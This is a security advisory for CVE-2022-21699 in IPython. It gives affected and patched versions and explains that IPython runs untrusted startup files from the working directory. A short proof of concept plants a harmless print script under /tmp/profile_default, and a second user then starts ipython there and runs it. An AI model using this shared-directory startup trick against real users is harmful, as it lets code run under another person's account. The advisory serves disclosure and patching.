Skip to content

Ipython exploit

CVE-2022-21699 Execution with Unnecessary Privileges in ipython


Affected versions

< 5.11

= 6.0.0, < 7.16.3

= 7.17.0, < 7.31.1

= 8.0.0, < 8.0.1

Patched versions

5.11

7.16.3

7.31.1

8.0.1

Description

该漏洞源于 IPython 在 CWD 中执行不受信任的文件。此漏洞允许一个用户以另一个用户的身份运行代码。

Proof of concept

User1:

mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py

User2:

cd /tmp
ipython

User2 will see:

Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets

Patched release and documentation

See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,

Version 8.0.1, 7.31.1 for current Python version are recommended.
Version 7.16.3 has also been published for Python 3.6 users,
Version 5.11 (source only, 5.x branch on github) for older Python versions.

References